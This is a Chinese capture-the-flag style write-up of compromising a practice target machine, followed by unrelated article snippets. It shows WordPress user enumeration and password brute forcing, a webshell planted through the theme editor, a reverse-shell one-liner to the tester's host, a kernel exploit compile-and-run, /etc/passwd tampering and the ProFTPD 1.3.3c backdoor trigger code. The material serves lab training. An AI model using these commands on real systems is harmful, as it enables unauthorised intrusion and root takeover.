渗透实战靶机3wp

news2024/12/23 19:55:01

0x00 简介

目标IP:xxxx.95

测试IP:xxxx.96

测试环境:win10、kali等

测试时间:2021.7.23-2021.7.26

测试人员:ruanruan

0x01 信息收集

1、端口扫描

在这里插入图片描述

  • 21,ftp,ProFTPD,1.3.3c
  • 22,ssh,Openssh,7.2
  • 80,web
2、目录扫描

通过御剑扫描到/secret/目录

在这里插入图片描述

访问是wordpress博客

在这里插入图片描述

0x02 初次尝试

1、21端口-ftp
  • 匿名登录,失败
  • 弱口令,失败
2、22端口-ssh

高版本,未做尝试

3、80端口-wordpress
  • 尝试后台getshell,投稿页面编辑一句话,未成功
  • 查找wordpress4.9版本漏洞,很多不能getshell
  • wpscan扫插件、主题、用户名等漏洞,无发现

利用wpscan先枚举出用户名,再爆破密码,得到admin/admin。

wpscan --url xxxx.95/secret -e u

在这里插入图片描述

wpscan --url xxxx.95/secret/ -U admin -P rockyou.txt
在这里插入图片描述

访问wp默认后台进行登录。

在这里插入图片描述

0x03 getshell

wordpress后台getshell的常见方法有:

  • 在线编辑
  • 上传文件
    • 媒体文件
    • 主题文件
    • 插件(webshell插件,非漏洞插件)

这里通过在线编辑页面。

首先点击主题,选择editor对404页面进行编辑,写一句话
在这里插入图片描述

完整页面链接:http://xxxx.95/secret/wp-content/themes/twentyseventeen/404.php

然后菜刀连接,getshell

0x04 获得高权限用户

1、收集信息

查看id,目前是www-data

在这里插入图片描述

查看端口开放情况

netstat -ano

在这里插入图片描述

查看数据库配置

在这里插入图片描述

查看home目录,猜测marlinspike为用户名

在这里插入图片描述

进入marlinspike目录,两个提示信息:sudo提权和proftpd后门?

在这里插入图片描述

查看etc/passwd,确认存在该用户

在这里插入图片描述

菜刀的shell不好用,反弹shell到kali

bash -c 'bash -i >&/dev/tcp/xxxx.96/2333' 0>&1

在这里插入图片描述

2、利用信息

猜测账号密码为marlinspike/marlinspike,ssh登录

在这里插入图片描述

然后就继续收集信息尝试提权。

0x05 提权

1、信息收集&尝试
  • linux常见提权尝试:
    • sudo:sudo -l
    • suid
      • find / -type f -perm -u=s 2>/dev/null -ls
    • crontab
      • ls -l |grep cron*
      • ls -al,看有无root权限执行的脚本
    • nfs
      • showmount -e ip
    • 内核
      • uname -a
      • searchsploit
  • mysql提权尝试,mysql服务以mysql权限运行,提权也只能得到mysql账号
  • ftp,同样没有以root权限运行,提权也只能得到ftp用户,不是root用户
2、sudo提权

sudo -l,查看root权限运行的命令

All~~,直接sudo su

在这里插入图片描述

3、内核提权
uname -a

在这里插入图片描述

searchsploit ubuntu 4.10.0

在这里插入图片描述

查看exp详细信息,获得路径

searchsploit -p 45010.c

在这里插入图片描述

登录sftp,上传exp

sftp marlinspike@xxxx.95
put 45010.c

在这里插入图片描述

编译.c文件并执行

gcc 45010.c -o exp
la -l exp
./exp
/bin/bash

在这里插入图片描述

4、低权限用户直接修改root密码

marlinspike账号有该文件的写权限。

ls -al /etc/passwd

在这里插入图片描述

可直接修改X为新密码
在这里插入图片描述

5、利用ProFTPD1.3.3c后门漏洞提权

前面的提示信息有暗示后门,没有善用搜索。

搜索:proftpd 1.3.3.c 后门

具体参考:https://blog.csdn.net/weixin_34384681/article/details/89798540

关键漏洞代码:

if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

在这里插入图片描述

0x06 总结

1、遇到的问题
  • wordpress后台getshell,在线编辑位置尝试错误
    • 对wordpress后台常见的getshell方法不够熟练,都尝试下
  • 从菜刀直接反弹shell到kali失败,显示/bin/sh,语法错误
    • webshell不是完整的交互式shell,通过bash -c 'xxx’解决
  • 找marlinspike密码时没有直接尝试用户名
    • 在尝试通过收集其他信息来获取,之后遇到任何密码未知情况都可以先试下用户名再尝试信息收集和爆破等方法。
  • 没有注意到可直接修改/etc/passwd
    • 对于etc/passwd、/etc/shadow、.sh等文件要注意其当前用户权限和执行权限。
  • 没有发现proftpd后门漏洞提权方法
    • 不了解该漏洞,但没有善用搜索。多思考、搜索每个信息的用处。
2、知识点
  • wordpress后台getshell方法总结
  • ProFTPD后门提权漏洞
  • 提权思想
    • 直接获取密码
    • 通过root权限运行的服务提权
3、反思
  • 做得较好的地方
    • 思路会更加清晰
    • 收集的信息整合分析较好
    • linux提权更加熟练
  • 需要继续努力的地方
    • 常见服务和cms的漏洞了解范围
    • 关键信息的思考和利用

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1181965.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Oracle 安装及 Spring 使用 Oracle

参考内容: docker安装oracle数据库史上最全步骤(带图文) Mac下oracle数据库客户端 Docker安装Oracle docker能安装oracle吗 Batch script for add a auto-increased primary key for exist table with records Docker 安装 Oracle11g 注意&a…

基于单片机的甲醛检测器设计

欢迎大家点赞、收藏、关注、评论啦 ,由于篇幅有限,只展示了部分核心代码。 技术交流认准下方 CSDN 官方提供的联系方式 文章目录 概要 一、设计的主要内容二、系统硬件设计三、软件设计4.1 程序结构流程图原理图 四、结论五、 文章目录 概要 本文将要提…

餐饮软件开发价格受到需求的影响!

随着科技的进步和互联网的普及,餐饮行业也逐渐实现了数字化转型,越来越多的餐厅开始引入餐饮软件来提升服务质量、提高效率、拓展销售渠道等。 而对于许多初创餐厅或餐饮企业来说,开发一款适合自己的餐饮软件的价格一直是他们关注的焦点&…

NtripShare Caster高精度定位CORS服务软件

NtripShare CORS是NtripShare GNSS系列软件中最早的软件系统,也是NtripShare名称的起源。 所谓GNSS CORS服务系统一般构成: 1)基准站网:由若干个分布合理的GNSS 基准站组成; 2)数据传输系统:…

基于springboot垃圾分类管理系统

基于springboot垃圾分类管理系统 摘要 垃圾分类管理系统是一个基于现代技术和数据管理方法的解决方案,旨在协助城市和社区更有效地管理垃圾分类。在这个系统中,Spring Boot框架充当了后端应用程序的构建工具,为其提供了高度灵活的特性。该系统…

运算符与运算表达式

运算符的结合性和优先级: 结合性: 所有的单目运算符、条件运算符、赋值运算符及扩展运算符,结合方向都是从右向左,其余运算符的结合方向是从左向右。 优先级: 初等运算符>单目运算符>算数运算符(…

卡牌游戏类型定制开发微信卡牌小程序游戏

卡牌类型的游戏开发具有一些独特的特点和挑战,以下是一些主要的特点: 卡牌设计和平衡:卡牌游戏的核心是卡牌设计和平衡。开发团队需要设计各种卡牌,确保它们在游戏中相互平衡,以便提供有趣的游戏体验。卡牌的特性、效…

UE5 新特性 Nanite 开启

啥也不说,只能说,真的牛,在自己的项目上,从10几20的帧数,直接彪到了70 适用场景: 大场景,三角面足够多 在Project Setting里面 将这几个勾未true 勾上这个,放入场景即可

小程序如何设置自取模式下的服务方式

设置自取模式下的服务方式是非常重要的,尤其是对于到店自取和到店堂食这两种不同的服务模式。下面我们就来介绍一下如何在小程序中设置这两种服务方式。 在小程序管理员后台->配送设置处,在服务方式处,设置自取情况下的服务方式。默认是&…

变量环境、变量提升和暂时性死区

JavaScript中的提升 在JavaScript中,“Hoisting”(提升)是一种特性,它将变量和函数的声明移动到作用域的顶部。这意味着可以在声明之前使用这些变量和函数,而不会报错。 当JavaScript代码执行时,会经过两个…

计算机网络基础知识1

1、tcp三次握手? SYN,标志位,用于建立TCP连接的握手过程中的标志位。 ACK,确认位,用于说明整个包是确认报文。 TCP/IP协议是传输层的一个面向连接提供可靠安全的传输协议。第一次握手有客户端发起,客户端向…

超详细的厦门旅游攻略!暑期旅游特种兵必备

随着暑期的旅游越来越火爆,许多旅行社纷纷向大家推荐了许多热门景点,其中厦门旅游是许多人暑假首选的地点,你知道这些宣传图片或旅游攻略是如何制作出来的吗? 今天为大家推荐一款能够快速制作出厦门旅游攻略的软件——boardmix博思…

MySQL(流量包)

MySQL和SQL的区别是什么?之间是什么关系? SQL(Structured Query Language)是用于管理和操作关系型数据库(RDBMS)的标准语言。SQL还可以用于这些RDBMS:MySQL、Oracle、Microsoft SQL Server、Pos…

Manopt使用

本文记录一些黎曼流型的优化工具箱的使用 入手 安装 https://www.manopt.org/tutorial.html#gettingstarted

Node.js |(六)express框架 | 尚硅谷2023版Node.js零基础视频教程

学习视频:尚硅谷2023版Node.js零基础视频教程,nodejs新手到高手 文章目录 📚express使用🐇初体验🐇express路由⭐️路由的使用⭐️获取请求参数⭐️获取路由参数 🐇express响应设置🐇express中间…

面试题:你在工作中发现最有意义的bug?

软件测试面试中被问的问题有时候会是形形色色的,不会局限在你会哪些测试设计技术?测试流程是怎么样的? 就比如你会遇到这种问题:工作中最有意义的bug? 是不是有点懵?面试官问这个题目可不是真的关心你提过…

Android 常用 UI 组件

目录 ​编辑 1. View 和ViewGroup 2. Android UI 开发概述 2.1 界面布局开发 2.2 控件开发 2.3 AdapterView 与 Adapter 开发 2.4 UI 组件开发 2.5 自定义 View、图形图像和动画 1. View 和ViewGroup Android中所有的UI元素都是使用View和ViewGroup对象建立的,…

【工具】OCR方法|不用下载额外的软件,提取扫描中英文PDF的目录文本的最优解!(一)

需求: 1)从PDF里快速提取目录; 2)不想下载任何软件。 我提取出来的目录文本会用于嵌入到PDF中,向PDF批量添加目录的软件以及软件的使用方法可以看我上一篇文章:PDF批量插入目录。 以下是我自己能想到的方…

竞赛 深度学习驾驶行为状态检测系统(疲劳 抽烟 喝水 玩手机) - opencv python

文章目录 1 前言1 课题背景2 相关技术2.1 Dlib人脸识别库2.2 疲劳检测算法2.3 YOLOV5算法 3 效果展示3.1 眨眼3.2 打哈欠3.3 使用手机检测3.4 抽烟检测3.5 喝水检测 4 最后 1 前言 🔥 优质竞赛项目系列,今天要分享的是 🚩 基于深度学习的驾…

【Python深入学习】- 书籍推荐|数据结构和算法介绍|内建集合数据类型

🌈个人主页: Aileen_0v0 🔥系列专栏:PYTHON学习系列专栏 💫"没有罗马,那就自己创造罗马~" 若把编写代码比作行军打仗,那么要想称霸沙场,不能仅靠手中的利刃,还需深谙兵法。Python是一把利刃&…